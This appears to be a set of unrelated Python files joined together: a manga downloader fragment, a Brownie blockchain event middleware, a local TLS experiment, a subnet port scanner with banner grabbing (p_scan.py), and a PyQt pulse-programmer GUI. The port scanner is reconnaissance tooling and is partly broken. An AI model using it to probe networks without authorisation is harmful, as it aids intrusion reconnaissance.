GObject.idle_add(row.update_state,"remove", "Remove","remove chapter "+ str(chapter.get_chapter_number()) + " from local storage?",True, False)
self._current_task["Chapter"] = None
self.threads["Chapter"] = None
def _update_runner( self, title ):
GObject.idle_add( self.update_status, True, "Updating : " + self.selection["Title"].get_title())
try:
status = title.update_streams()
if status == 0:
print("Status " + str(status))
GObject.idle_add( self._update_chapter_list)
GObject.idle_add( self.update_status, False, "Updated : " + self.selection["Title"].get_title())
title.to_json_file(title.save_location)
else:
popup = Error_Popup(self,"Update Error", "Site returned error " + str(status))
popup.run()
popup.destroy()
except Exception as e:
traceback.print_exc(file=sys.stdout)
print("Error occured: " + str(e))
self.threads["Stream"] = None
|
event_subscribe.py
|
from typing import Callable, Dict, List, Optional
from collections import OrderedDict
import threading
import time
import json
from wpath import *
from hexbytes import HexBytes
from web3 import Web3
from web3.exceptions import (
InvalidEventABI,
LogTopicError,
MismatchedABI,
)
from brownie.network.middlewares import BrownieMiddlewareABC
from brownie import project
from brownie._config import CONFIG
from web3._utils.events import get_event_data
def get_contract_by_address(active_project, address):
for contract_name in active_project.keys():
contracts = active_project.dict()[contract_name]
for contract in contracts:
if contract.address == address:
return contract
return None
request_duty = 6
message_event_abi = {
"anonymous": False,
"inputs": [
{
"indexed": False,
"internalType": "string",
"name": "msg",
"type": "string",
}
],
"name": "Message",
"type": "event",
}
def parse_log(
w3,
log,
):
codec = w3.codec
try:
evt = get_event_data(codec, message_event_abi, log)
print(f'\n{color_y("console.log:")} {color_r(str(evt["args"]["msg"]))}')
except MismatchedABI:
pass
except Exception as e:
print_m(type(e))
print_r(f"error:{e}")
class EventSubscribeMiddleware(BrownieMiddlewareABC):
def __init__(self, w3: Web3) -> None:
self.w3 = w3
latest = w3.eth.get_block("latest")
self.last_block = latest.hash
self.last_block_seen = latest.timestamp
self.last_request = 0.0
self.last_request = 0.0
self.event_cache: OrderedDict = OrderedDict()
self.event_filter = w3.eth.filter({"topics": []})
self.lock = threading.Lock()
self.event = threading.Event()
self.is_killed = False
self.active_project = project.get_loaded_projects()[0]
threading.Thread(target=self.event_filter_loop, daemon=True).start()
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
return 0
def get_contract_by_address(self, address):
return get_contract_by_address(self.active_project, address)
def event_filter_loop(self) -> None:
n = 0
while not self.is_killed:
n += 1
#print_y(f"===>event_filter_loop {n}")
# if the last RPC request was > 60 seconds ago, reduce the rate of updates.
# we eventually settle at one query per minute after 10 minutes of no requests.
with self.lock:
# print('----> lock 11')
if self.time_since > request_duty:
self.event_cache.clear()
self.event.clear()
if self.time_since > request_duty:
self.event.wait(min(self.time_since / 10, request_duty))
# query the filter for new blocks
with self.lock:
# print('----> lock 12')
# 获取新事件
try:
new_events = self.event_filter.get_new_entries()
except (AttributeError, ValueError):
# web3 has disconnected, or the filter has expired from inactivity
if self.w3.isConnected():
self.event_filter = self.w3.eth.filter({"topics": []})
continue
else:
return
# 如果获取新事件成功
if new_events:
for event in new_events:
if CONFIG.settings.get("show_all_events"):
print_r(f"\n---->event:{event}" )
parse_log(self.w3, event)
# contract_address = event["address"]
# _contract = self.get_contract_by_address(contract_address)
# if _contract:
# tx_hash = event["transactionHash"]
# receipt = self.w3.eth.get_transaction_receipt(tx_hash)
# # print('---->get_contract success')
# contract = self.w3.eth.contract(
# address=_contract.address, abi=_contract.abi
# )
# # contract = self.w3.eth.contract(abi=_contract.abi)
# message_event = contract.events.Message()
# # print("====>message_event:", message_event)
# processed_logs = message_event.processReceipt(receipt)
# if CONFIG.settings.get("show_parsed_events"):
# print("\n---->parsed event:", processed_logs)
# for log in processed_logs:
# try:
# print("\n---->msg:", log["args"]["msg"])
# except Exception as e:
# print("parse msg error\n", e)
if new_events and self.time_since < 15:
# if this update found a new block and we've been querying
# frequently, we can wait a few seconds before the next update
time.sleep(5)
elif time.time() - self.last_block_seen < 15:
# if it's been less than 15 seconds since the last block, wait 2 seconds
time.sleep(2)
else:
# if it's been more than 15 seconds, only wait 1 second
time.sleep(1)
@property
def time_since(self) -> float:
return time.time() - self.last_request
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
result = make_request(method, params)
if method in ("eth_call", "eth_estimateGas"):
if "error" in result:
raise ValueError(result["error"])
return result
def uninstall(self) -> None:
self.is_killed = True
if self.w3.isConnected():
self.w3.eth.uninstallFilter(self.event_filter.filter_id)
|
experiment.py
|
#!/usr/bin/python3
import os
import socket
import ssl
import threading
import time
hostname = '127.0.0.1'
port = 40000
thisdir = os.path.dirname(os.path.realpath(__file__))
CA_FOLDER = thisdir + '/ca-rsa'
CLIENT_FOLDER = thisdir + '/client-rsa'
SERVER_FOLDER = thisdir + '/server-rsa'
def server_thread():
#srvctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
srvctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
srvctx.verify_mode = ssl.CERT_REQUIRED
srvctx.load_cert_chain(
SERVER_FOLDER + '/server.crt', SERVER_FOLDER + '/server.key')
srvctx.load_verify_locations(CA_FOLDER + '/CA.Root.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind((hostname, port))
sock.listen(5)
while True:
print('waiting for client')
newsock, addr = sock.accept()
print("Client connected: {}:{}".format(addr[0], addr[1]))
with srvctx.wrap_socket(newsock, server_side=True) as ssock:
print("SSL established. Peer: {}".format(ssock.getpeercert()))
buf = b'' # Buffer to hold received client data
try:
while True:
data = ssock.recv(4096)
if data:
# Client sent us data. Append to buffer
buf += data
else:
# No more data from client. Show buffer and close connection.
print("Received:", buf)
break
finally:
print("Closing connection")
ssock.shutdown(socket.SHUT_RDWR)
ssock.close()
def client_thread():
# PROTOCOL_TLS_CLIENT requires valid cert chain and hostname
#cltctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#cltctx.load_verify_locations(CLIENT_FOLDER + '/client.crt')
cltctx = ssl.create_default_context(
ssl.Purpose.SERVER_AUTH)
# ssl.Purpose.SERVER_AUTH, cafile=SERVER_FOLDER + '/server.crt')
cltctx.load_cert_chain(certfile=CLIENT_FOLDER + '/client.crt',
keyfile=CLIENT_FOLDER + '/client.key')
cltctx.load_verify_locations(CA_FOLDER + '/CA.Root.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
with cltctx.wrap_socket(sock, server_side=False, server_hostname=hostname) as ssock:
print(ssock.version())
ssock.connect((hostname, port))
print("SSL established. Peer: {}".format(ssock.getpeercert()))
print("Sending: 'Hello, world!")
ssock.send(b"Hello, world!")
print("Closing connection")
ssock.close()
def main():
print('Starting!')
srv = threading.Thread(target=server_thread, name='SERVER')
clt = threading.Thread(target=client_thread, name='CLIENT')
srv.start()
time.sleep(1)
clt.start()
clt.join()
srv.join()
main()
|
p_scan.py
|
#!/usr/bin/python
#@syntax
# network/mask port_range (timeout)
# ex. p_scan.py 192.168.1.0/24 20-1024 (20)
import socket
import sys
from math import floor, ceil
from multiprocessing import Process, Queue
def find_next_host(last_host_ip):
s = 3
tmp_host_func = last_host_ip
while(True):
if (last_host_ip[s] == 255):
s -= 1
else:
tmp_host_func[s] = tmp_host_func[s] + 1
return tmp_host_func
def port_check(host,port_start,port_end,timeout,return_queue):
s = socket.socket()
s.settimeout(timeout)
for port in range(port_start,port_end+1):
try:
s.connect((host,port))
s.send(bytes(('.', 'UTF-8')))
banner = s.recv(1024)
s.close()
if banner:
return_queue.put((host,port))
#Want a nice print, uncomment
#print ('[+] Port '+str(port)+' open at '+host+' '+str(banner))
except Exception as e:
pass
def main():
try:
ip_range = sys.argv[1]
port_range = sys.argv[2]
except:
print ("Syntax Error")
print ("Correct syntax : ip_range port_range")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
try:
timeout = int(sys.argv[3])
except:
timeout = 20
ip_split = ip_range.split('/')
if (ip_split == ip_range):
print ("Syntax Error \n")
print ("Correct syntax : network/mask port_range \n")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
port_split = port_range.split('-')
if (port_split == port_range):
print ("Syntax Error \n")
print ("Correct syntax : network/mask port_range \n")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
port_start = port_split[0]
port_end = port_split[1]
try:
port_start = int(port_start)
port_end = int(port_end)
if (port_start > port_end):
raise
except:
print("Port not an integer or wrong port syntax")
sys.exit()
network = ip_split[0]
try:
mask = int(ip_split[1])
if (mask > 32):
raise
except:
print("Network mask is not an Integer or is greater than 32")
sys.exit()
network_dotted = network.split('.')
if (network_dotted == network or len(network_dotted) != 4 ):
print("Wrong IP formating")
sys.exit()
i = 0
try:
for ip_part in network_dotted:
network_dotted[i] = int(ip_part)
if (network_dotted[i] > 255):
raise
network_dotted[i] = bin(network_dotted[i])
network_dotted[i] = list(network_dotted[i][2:])
i += 1
except:
print ("Wrond IP formating")
network_base = []
for ip_part in network_dotted:
for k in range(len(ip_part),8):
ip_part[0:0] = ['0']
for j in range(0,int(floor(mask/8))):
network_base.append(network_dotted[j])
if (mask%8 != 0):
network_base.append(network_dotted[j+1][:(mask%8)] + ['0'] *(8-(mask%8)))
for j in range(int(ceil(mask/8)),4):
network_base.append((['0']*8))
network_base[3][7] = '1'
ip_base_parts = []
for ip_part in network_base:
ip_part[0:0] = ['0','b']
ip_base_parts.append(''.join(ip_part))
for j in range(0,4):
ip_base_parts[j] = int(ip_base_parts[j],2)
hosts = (2**(32 - mask)) - 2
hosts_to_scan = []
last_host_ip = ip_base_parts
host_tmp = []
for j in range(0,4):
host_tmp.append(str(ip_base_parts[j]))
hosts_to_scan.append('.'.join(host_tmp))
for j in range(0,hosts-1):
host_tmp = []
last_host = find_next_host(last_host_ip)
for j in range(0,4):
host_tmp.append(str(last_host[j]))
hosts_to_scan.append('.'.join(host_tmp))
jobs = []
q = Queue()
for host_ip in hosts_to_scan:
proc = Process(target=port_check,args=(host_ip,port_start,port_end,timeout,q))
jobs.append(proc)
for j in jobs:
j.start()
for j in jobs:
j.join()
for i in range(0,q.qsize()):
pr = q.get()
#You can do more stuff with pr
print (pr)
#Start Here!
if __name__ == "__main__":
main()
|
pulse_creator.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
from multiprocessing import Process, Pipe
#from PyQt5.QtWidgets import QListView, QAction, QWidget
from PyQt5.QtWidgets import QFileDialog
from PyQt5 import QtWidgets, uic #, QtCore, QtGui
from PyQt5.QtGui import QIcon
import atomize.general_modules.general_functions as general
import atomize.device_modules.PB_ESR_500_pro as pb_pro
import atomize.device_modules.BH_15 as bh
class MainWindow(QtWidgets.QMainWindow):
"""
A main window class
"""
def __init__(self, *args, **kwargs):
"""
A function for connecting actions and creating a main window
"""
super(MainWindow, self).__init__(*args, **kwargs)
path_to_main = os.path.dirname(os.path.abspath(__file__))
gui_path = os.path.join(path_to_main,'gui/pulse_main_window.ui')
icon_path = os.path.join(path_to_main, 'gui/icon_pulse.png')
self.setWindowIcon( QIcon(icon_path) )
self.path = os.path.join(path_to_main, '..', 'tests/pulse_epr')
self.destroyed.connect(lambda: self._on_destroyed()) # connect some actions to exit
# Load the UI Page
uic.loadUi(gui_path, self) # Design file
self.pb = pb_pro.PB_ESR_500_Pro()
self.bh15 = bh.BH_15()
# First initialization problem
# corrected directly in the module BH-15
#try:
#self.bh15.magnet_setup( 3500, 0.5 )
#except BrokenPipeError:
# pass
# Connection of different action to different Menus and Buttons
self.button_off.clicked.connect(self.turn_off)
self.button_off.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_stop.clicked.connect(self.stop)
self.button_stop.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_update.clicked.connect(self.update)
self.button_update.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
# text labels
self.errors.setStyleSheet("QPlainTextEdit { color : rgb(211, 194, 78); }") # rgb(193, 202, 227)
self.label.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_2.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_3.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_4.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_5.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_6.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
# Spinboxes
self.P1_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P1_st.lineEdit().setReadOnly( True ) # block input from keyboard
self.P2_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P2_st.lineEdit().setReadOnly( True )
self.P3_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P3_st.lineEdit().setReadOnly( True )
self.P4_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P4_st.lineEdit().setReadOnly( True )
self.P5_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P5_st.lineEdit().setReadOnly( True )
self.P6_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P6_st.lineEdit().setReadOnly( True )
self.P7_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P7_st.lineEdit().setReadOnly( True )
self.Rep_rate.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
self.Field.setStyleSheet("QDoubleSpinBox { color : rgb(193, 202, 227); }")
self.P1_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P1_len.lineEdit().setReadOnly( True )
self.P2_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P2_len.lineEdit().setReadOnly( True )
self.P3_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P3_len.lineEdit().setReadOnly( True )
self.P4_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P4_len.lineEdit().setReadOnly( True )
self.P5_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P5_len.lineEdit().setReadOnly( True )
self.P6_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P6_len.lineEdit().setReadOnly( True )
self.P7_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P7_len.lineEdit().setReadOnly( True )
self.P1_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P2_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P3_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P4_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P5_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P6_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P7_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_1.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_2.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_3.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_4.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_5.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_6.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_7.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
# Functions
self.P1_st.valueChanged.connect(self.p1_st)
self.p1_start = self.add_ns( self.P1_st.value() )
self.P2_st.valueChanged.connect(self.p2_st)
self.p2_start = self.add_ns( self.P2_st.value() )
self.P3_st.valueChanged.connect(self.p3_st)
self.p3_start = self.add_ns( self.P3_st.value() )
self.P4_st.valueChanged.connect(self.p4_st)
self.p4_start = self.add_ns( self.P4_st.value() )
self.P5_st.valueChanged.connect(self.p5_st)
self.p5_start = self.add_ns( self.P5_st.value() )
self.P6_st.valueChanged.connect(self.p6_st)
self.p6_start = self.add_ns( self.P6_st.value() )
self.P7_st.valueChanged.connect(self.p7_st)
self.p7_start = self.add_ns( self.P7_st.value() )
self.P1_len.valueChanged.connect(self.p1_len)
self.p1_length = self.add_ns( self.P1_len.value() )
self.P2_len.valueChanged.connect(self.p2_len)
self.p2_length = self.add_ns( self.P2_len.value() )
self.P3_len.valueChanged.connect(self.p3_len)
self.p3_length = self.add_ns( self.P3_len.value() )
self.P4_len.valueChanged.connect(self.p4_len)
self.p4_length = self.add_ns( self.P4_len.value() )
self.P5_len.valueChanged.connect(self.p5_len)
self.p5_length = self.add_ns( self.P5_len.value() )
self.P6_len.valueChanged.connect(self.p6_len)
self.p6_length = self.add_ns( self.P6_len.value() )
self.P7_len.valueChanged.connect(self.p7_len)
self.p7_length = self.add_ns( self.P7_len.value() )
self.Rep_rate.valueChanged.connect(self.rep_rate)
self.repetition_rate = str( self.Rep_rate.value() ) + ' Hz'
self.Field.valueChanged.connect(self.field)
self.mag_field = float( self.Field.value() )
self.bh15.magnet_setup( self.mag_field, 0.5 )
self.P1_type.currentIndexChanged.connect(self.p1_type)
self.p1_typ = str( self.P1_type.currentText() )
self.P2_type.currentIndexChanged.connect(self.p2_type)
self.p2_typ = str( self.P2_type.currentText() )
self.P3_type.currentIndexChanged.connect(self.p3_type)
self.p3_typ = str( self.P3_type.currentText() )
self.P4_type.currentIndexChanged.connect(self.p4_type)
self.p4_typ = str( self.P4_type.currentText() )
self.P5_type.currentIndexChanged.connect(self.p5_type)
self.p5_typ = str( self.P5_type.currentText() )
self.P6_type.currentIndexChanged.connect(self.p6_type)
self.p6_typ = str( self.P6_type.currentText() )
self.P7_type.currentIndexChanged.connect(self.p7_type)
self.p7_typ = str( self.P7_type.currentText() )
self.laser_flag = 0
self.laser_q_switch_delay = 165000 # in ns
self.Phase_1.currentIndexChanged.connect(self.phase_1)
self.ph_1 = self.phase_converted( self.Phase_1.currentText() )
self.Phase_2.currentIndexChanged.connect(self.phase_2)
self.ph_2 = self.phase_converted( self.Phase_2.currentText() )
self.Phase_3.currentIndexChanged.connect(self.phase_3)
self.ph_3 = self.phase_converted( self.Phase_3.currentText() )
self.Phase_4.currentIndexChanged.connect(self.phase_4)
self.ph_4 = self.phase_converted( self.Phase_4.currentText() )
self.Phase_5.currentIndexChanged.connect(self.phase_5)
self.ph_5 = self.phase_converted( self.Phase_5.currentText() )
self.Phase_6.currentIndexChanged.connect(self.phase_6)
self.ph_6 = self.phase_converted( self.Phase_6.currentText() )
self.Phase_7.currentIndexChanged.connect(self.phase_7)
self.ph_7 = self.phase_converted( self.Phase_7.currentText() )
self.menu_bar_file()
def menu_bar_file(self):
"""
Design settings for QMenuBar
"""
self.menuBar.setStyleSheet("QMenuBar { color: rgb(193, 202, 227); } \
QMenu::item { color: rgb(211, 194, 78); } QMenu::item:selected {color: rgb(193, 202, 227); }")
self.action_read.triggered.connect( self.open_file_dialog )
self.action_save.triggered.connect( self.save_file_dialog )
def open_file_dialog(self):
"""
A function to open a new window for choosing a pulse list
"""
filedialog = QFileDialog(self, 'Open File', directory = self.path, filter = "Pulse List (*.pulse)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
def save_file_dialog(self):
"""
A function to open a new window for choosing a pulse list
"""
filedialog = QFileDialog(self, 'Save File', directory = self.path, filter = "Pulse List (*.pulse)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
filedialog.setAcceptMode(QFileDialog.AcceptSave)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.save_file)
filedialog.show()
def open_file(self, filename):
"""
A function to open a pulse list
:param filename: string
"""
text = open(filename).read()
lines = text.split('\n')
self.setter(text, 0, self.P1_type, self.P1_st, self.P1_len, self.Phase_1)
self.setter(text, 1, self.P2_type, self.P2_st, self.P2_len, self.Phase_2)
self.setter(text, 2, self.P3_type, self.P3_st, self.P3_len, self.Phase_3)
self.setter(text, 3, self.P4_type, self.P4_st, self.P4_len, self.Phase_4)
self.setter(text, 4, self.P5_type, self.P5_st, self.P5_len, self.Phase_5)
self.setter(text, 5, self.P6_type, self.P6_st, self.P6_len, self.Phase_6)
self.setter(text, 6, self.P7_type, self.P7_st, self.P7_len, self.Phase_7)
self.Rep_rate.setValue( int( lines[7].split(': ')[1] ) )
self.Field.setValue( float( lines[8].split(': ')[1] ) )
#self.errors.setPlainText( str( text.split('\n')[3].split(', ')[3] ) )
#self.errors.appendPlainText( str( self.p1_start ) + ' ' + str( self.p4_start ) + ' ' + str( self.p7_start ) )
#self.errors.appendPlainText( str( self.p1_length ) + ' ' + str( self.p4_length ) + ' ' + str( self.p7_length ) )
#self.errors.appendPlainText( str( self.p1_typ ) + ' ' + str( self.p4_typ ) + ' ' + str( self.p7_typ ) )
#self.errors.appendPlainText( str( self.ph_1 ) + ' ' + str( self.ph_4 ) + ' ' + str( self.ph_7 ) )
def setter(self, text, index, typ, st, leng, phase):
"""
Auxiliary function to set all the values from *.pulse file
"""
array = text.split('\n')[index].split(': ')[1].split(', ')
typ.setCurrentText( array[0] )
st.setValue( int( array[1] ) )
leng.setValue( int( array[2] ) )
phase.setCurrentText( str( array[3] ) )
def save_file(self, filename):
"""
A function to save a new pulse list
:param filename: string
"""
if filename[-5:] != 'pulse':
filename = filename + '.pulse'
with open(filename, 'w') as file:
file.write( 'P1: ' + self.P1_type.currentText() + ', ' + str(self.P1_st.value()) + ', ' + str(self.P1_len.value()) + ', ' + self.Phase_1.currentText() + '\n' )
file.write( 'P2: ' + self.P2_type.currentText() + ', ' + str(self.P2_st.value()) + ', ' + str(self.P2_len.value()) + ', ' + self.Phase_2.currentText() + '\n' )
file.write( 'P3: ' + self.P3_type.currentText() + ', ' + str(self.P3_st.value()) + ', ' + str(self.P3_len.value()) + ', ' + self.Phase_3.currentText() + '\n' )
file.write( 'P4: ' + self.P4_type.currentText() + ', ' + str(self.P4_st.value()) + ', ' + str(self.P4_len.value()) + ', ' + self.Phase_4.currentText() + '\n' )
file.write( 'P5: ' + self.P5_type.currentText() + ', ' + str(self.P5_st.value()) + ', ' + str(self.P5_len.value()) + ', ' + self.Phase_5.currentText() + '\n' )
file.write( 'P6: ' + self.P6_type.currentText() + ', ' + str(self.P6_st.value()) + ', ' + str(self.P6_len.value()) + ', ' + self.Phase_6.currentText() + '\n' )
file.write( 'P7: ' + self.P7_type.currentText() + ', ' + str(self.P7_st.value()) + ', ' + str(self.P7_len.value()) + ', ' + self.Phase_7.currentText() + '\n' )
file.write( 'Rep rate: ' + str(self.Rep_rate.value()) + '\n' )
file.write( 'Field: ' + str(self.Field.value()) + '\n' )
def phase_converted(self, ph_str):
if ph_str == '+x':
return '+x'
elif ph_str == '-x':
return '-x'
elif ph_str == '+y':
return '+y'
elif ph_str == '-y':
return '-y'
def phase_1(self):
"""
A function to change a pulse 1 phase
"""
self.ph_1 = self.phase_converted( self.Phase_1.currentText() )
def phase_2(self):
"""
A function to change a pulse 2 phase
"""
self.ph_2 = self.phase_converted( self.Phase_2.currentText() )
def phase_3(self):
"""
A function to change a pulse 3 phase
"""
self.ph_3 = self.phase_converted( self.Phase_3.currentText() )
def phase_4(self):
"""
A function to change a pulse 4 phase
"""
self.ph_4 = self.phase_converted( self.Phase_4.currentText() )
def phase_5(self):
"""
A function to change a pulse 5 phase
"""
self.ph_5 = self.phase_converted( self.Phase_5.currentText() )
def phase_6(self):
"""
A function to change a pulse 6 phase
"""
self.ph_6 = self.phase_converted( self.Phase_6.currentText() )
def phase_7(self):
"""
A function to change a pulse 7 phase
"""
self.ph_7 = self.phase_converted( self.Phase_7.currentText() )
def remove_ns(self, string1):
return string1.split(' ')[0]
def add_ns(self, string1):
"""
Function to add ' ns'
"""
return str( string1 ) + ' ns'
def check_length(self, length):
self.errors.clear()
if int( length ) != 0 and int( length ) < 12:
self.errors.appendPlainText( 'Pulse should be longer than 12 ns' )
return length
def _on_destroyed(self):
"""
A function to do some actions when the main window is closing.
"""
self.pb.pulser_stop()
#sys.exit()
def quit(self):
"""
A function to quit the programm
"""
self._on_destroyed()
sys.exit()
def p1_st(self):
"""
A function to set pulse 1 start
"""
self.p1_start = self.P1_st.value()
if self.p1_start % 2 != 0:
self.p1_start = self.p1_start + 1
self.P1_st.setValue( self.p1_start )
self.p1_start = self.add_ns( self.P1_st.value() )
def p2_st(self):
"""
A function to set pulse 2 start
"""
self.p2_start = self.P2_st.value()
if self.p2_start % 2 != 0:
self.p2_start = self.p2_start + 1
self.P2_st.setValue( self.p2_start )
self.p2_start = self.add_ns( self.P2_st.value() )
def p3_st(self):
"""
A function to set pulse 3 start
"""
self.p3_start = self.P3_st.value()
if self.p3_start % 2 != 0:
self.p3_start = self.p3_start + 1
self.P3_st.setValue( self.p3_start )
self.p3_start = self.add_ns( self.P3_st.value() )
def p4_st(self):
"""
A function to set pulse 4 start
"""
self.p4_start = self.P4_st.value()
if self.p4_start % 2 != 0:
self.p4_start = self.p4_start + 1
self.P4_st.setValue( self.p4_start )
self.p4_start = self.add_ns( self.P4_st.value() )
def p5_st(self):
"""
A function to set pulse 5 start
"""
self.p5_start = self.P5_st.value()
if self.p5_start % 2 != 0:
self.p5_start = self.p5_start + 1
self.P5_st.setValue( self.p5_start )
self.p5_start = self.add_ns( self.P5_st.value() )
def p6_st(self):
"""
A function to set pulse 6 start
"""
self.p6_start = self.P6_st.value()
if self.p6_start % 2 != 0:
self.p6_start = self.p6_start + 1
self.P6_st.setValue( self.p6_start )
self.p6_start = self.add_ns( self.P6_st.value() )
def p7_st(self):
"""
A function to set pulse 7 start
"""
self.p7_start = self.P7_st.value()
if self.p7_start % 2 != 0:
self.p7_start = self.p7_start + 1
self.P7_st.setValue( self.p7_start )
self.p7_start = self.add_ns( self.P7_st.value() )
def p1_len(self):
"""
A function to change a pulse 1 length
"""
self.p1_length = self.P1_len.value()
if self.p1_length % 2 != 0:
self.p1_length = self.p1_length + 1
self.P1_len.setValue( self.p1_length )
pl = self.check_length( self.P1_len.value() )
self.p1_length = self.add_ns( pl )
def p2_len(self):
"""
A function to change a pulse 2 length
"""
self.p2_length = self.P2_len.value()
if self.p2_length % 2 != 0:
self.p2_length = self.p2_length + 1
self.P2_len.setValue( self.p2_length )
pl = self.check_length( self.P2_len.value() )
self.p2_length = self.add_ns( pl )
def p3_len(self):
"""
A function to change a pulse 3 length
"""
self.p3_length = self.P3_len.value()
if self.p3_length % 2 != 0:
self.p3_length = self.p3_length + 1
self.P3_len.setValue( self.p3_length )
pl = self.check_length( self.P3_len.value() )
self.p3_length = self.add_ns( pl )
def p4_len(self):
"""
A function to change a pulse 4 length
"""
self.p4_length = self.P4_len.value()
if self.p4_length % 2 != 0:
self.p4_length = self.p4_length + 1
self.P4_len.setValue( self.p4_length )
pl = self.check_length( self.P4_len.value() )
self.p4_length = self.add_ns( pl )
def p5_len(self):
"""
A function to change a pulse 5 length
"""
self.p5_length = self.P5_len.value()
if self.p5_length % 2 != 0:
self.p5_length = self.p5_length + 1
self.P5_len.setValue( self.p5_length )
pl = self.check_length( self.P5_len.value() )
self.p5_length = self.add_ns( pl )
def p6_len(self):
"""
A function to change a pulse 6 length
"""
self.p6_length = self.P6_len.value()
if self.p6_length % 2 != 0:
self.p6_length = self.p6_length + 1
self.P6_len.setValue( self.p6_length )
pl = self.check_length( self.P6_len.value() )
self.p6_length = self.add_ns( pl )
def p7_len(self):
"""
A function to change a pulse 7 length
"""
self.p7_length = self.P7_len.value()
if self.p7_length % 2 != 0:
self.p7_length = self.p7_length + 1
self.P7_len.setValue( self.p7_length )
pl = self.check_length( self.P7_len.value() )
self.p7_length = self.add_ns( pl )
def p1_type(self):
"""
A function to change a pulse 1 type
"""
self.p1_typ = str( self.P1_type.currentText() )
def p2_type(self):
"""
A function to change a pulse 2 type
"""
self.p2_typ = str( self.P2_type.currentText() )
if self.p2_typ == 'LASER':
self.laser_flag = 1
else:
self.laser_flag = 0
def p3_type(self):
"""
A function to change a pulse 3 type
"""
self.p3_typ = str( self.P3_type.currentText() )
def p4_type(self):
"""
A function to change a pulse 4 type
"""
self.p4_typ = str( self.P4_type.currentText() )
def p5_type(self):
"""
A function to change a pulse 5 type
"""
self.p5_typ = str( self.P5_type.currentText() )
def p6_type(self):
"""
A function to change a pulse 6 type
"""
self.p6_typ = str( self.P6_type.currentText() )
def p7_type(self):
"""
A function to change a pulse 7 type
"""
self.p7_typ = str( self.P7_type.currentText() )
def rep_rate(self):
"""
A function to change a repetition rate
"""
